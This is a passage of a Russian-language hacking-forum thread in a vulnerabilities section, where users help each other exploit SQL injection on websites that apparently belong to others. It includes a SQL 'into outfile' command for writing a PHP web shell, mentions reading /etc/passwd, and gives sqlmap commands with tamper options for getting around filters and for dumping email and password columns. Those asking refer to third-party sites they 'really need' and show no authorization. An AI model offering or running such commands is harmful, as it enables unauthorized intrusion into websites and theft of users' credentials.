HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #71  
Старый 30.12.2015, 21:42
grimnir
Guest
Сообщений: n/a
Провел на форуме:
216062

Репутация: 231
По умолчанию

Цитата:
Сообщение от Legionanonymous  
Legionanonymous said:

Файл /etc/password получилось скачать и просмотреть там логи какие то. Но вот как именно узнать есть или нету права на запись в какой нибудь папке не могу вкурить, и пример команды для залития шелла можно пожалуйста.
а полный путь у вас уже есть? вида /home/www/ ??

Если говорите /etc/password получилось именно скачать,то можно конфиги так же считать,но опять же говорю нужен полный путь

"пример команды для залития шелла можно пожалуйста."

Код:
Code:
select '' into outfile '/home/www/ тут каталог с правами на запись /shell.php'
 
Ответить с цитированием

  #72  
Старый 30.12.2015, 21:49
Legionanonymous
Guest
Сообщений: n/a
Провел на форуме:
2626

Репутация: 0
По умолчанию

Цитата:
Сообщение от grimnir  
grimnir said:

а полный путь у вас уже есть? вида /home/www/ ??
Если говорите /etc/password получилось именно скачать,то можно конфиги так же считать,но опять же говорю нужен полный путь
"пример команды для залития шелла можно пожалуйста."
Код:
Code:
select '' into outfile '/home/www/ тут каталог с правами на запись /shell.php'
Полного пути нету, я хз как его найти, пожалуйста братюнь обьясни чё по чём, или напиши в лс я тебе дам ссылку сайта может подскажешь, очень нужен сайт этот
 
Ответить с цитированием

  #73  
Старый 31.12.2015, 17:11
LeninDie
Guest
Сообщений: n/a
Провел на форуме:
12479

Репутация: 2
По умолчанию

раньше выводились все данные нормально, сегодня пробую и вот такое:



среди доступных бд было 4, теперь одна и невозможно ничего вывести. перепроверил - уязвимость осталась. как я понимаю доступа к бд больше нет? не могу даже через --sql-shell select version() вывести.

--tamper="between,randomcase,space2comment" -v 3 и -D db_site --tables --technique=B --no-cast -v3 пробовал - не помогло
 
Ответить с цитированием

  #74  
Старый 07.01.2016, 01:49
BabaDook
Guest
Сообщений: n/a
Провел на форуме:
238786

Репутация: 40
По умолчанию

Всем привет.

Подскажите пожалуйста люди умные, люди смелые для чего нужны функции

--alert

--eval
 
Ответить с цитированием

  #75  
Старый 07.01.2016, 17:49
ph03nix
Guest
Сообщений: n/a
Провел на форуме:
1045

Репутация: 0
По умолчанию

Ребята, всем привет, я новенький и сразу с вопросом))

Вот прогнал ZAP'ом нужный мне сайт, нашел уязвимость "0 AND 1=1 -- " Как ей воспользоваться??
 
Ответить с цитированием

  #76  
Старый 07.01.2016, 18:27
Shubka75
Guest
Сообщений: n/a
Провел на форуме:
11851

Репутация: 30
По умолчанию

Цитата:
Сообщение от ph03nix  
ph03nix said:

Вот прогнал ZAP'ом нужный мне сайт, нашел уязвимость "0 AND 1=1 -- " Как ей воспользоваться??
sqlmap.py -u "http://www.site.com/ уязвимый параметр" --technique=B
 
Ответить с цитированием

  #77  
Старый 07.01.2016, 19:07
ph03nix
Guest
Сообщений: n/a
Провел на форуме:
1045

Репутация: 0
По умолчанию

Цитата:
Сообщение от Shubka75  
Shubka75 said:

sqlmap.py -u "
http://www.site.com/
уязвимый параметр" --technique=B
Так, спасибо, но не понял, уязвимый параметр это что то типа "index.php?id=", дело в том что ZAP выдал уязвимость на странице "http://site.ru/"
 
Ответить с цитированием

  #78  
Старый 08.01.2016, 01:23
0x1d
Guest
Сообщений: n/a
Провел на форуме:
2356

Репутация: 0
По умолчанию

Всем привет! Подскажите, как сделать дамп значений всех колонок по условию его соответствия одной колонки из всех. Например: Вывести password и email если userID=1? Спасибо.
 
Ответить с цитированием

  #79  
Старый 08.01.2016, 02:15
Shubka75
Guest
Сообщений: n/a
Провел на форуме:
11851

Репутация: 30
По умолчанию

Цитата:
Сообщение от 0x1d  
0x1d said:

Всем привет! Подскажите, как сделать дамп значений всех колонок по условию его соответствия одной колонки из всех. Например: Вывести password и email если userID=1? Спасибо.
-C email,password --where="userID=1" --dump
 
Ответить с цитированием

  #80  
Старый 08.01.2016, 15:39
Bobrenz
Guest
Сообщений: n/a
Провел на форуме:
8228

Репутация: 0
По умолчанию

Цитата:
Сообщение от vikler  
vikler said:

Какая версия? Если нет information_schema => только брут
или у тебя вообще не MySQL?
Есть ещё такие варианты:
1) Есть ограничение подключений на сервере. Так было на одном сайте: там была boolean, но при дампе имена таблиц не выдавались. Сработало действовать в один поток только
2) Может быть фильтрация , (запятых), тогда нужно tamper script использовать:
тот, что в новой версии мапа. Типа флаги --fresh-queries --tamper=commalessmid
есть мскл версия 3, а вот инфо схемы увы нет
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ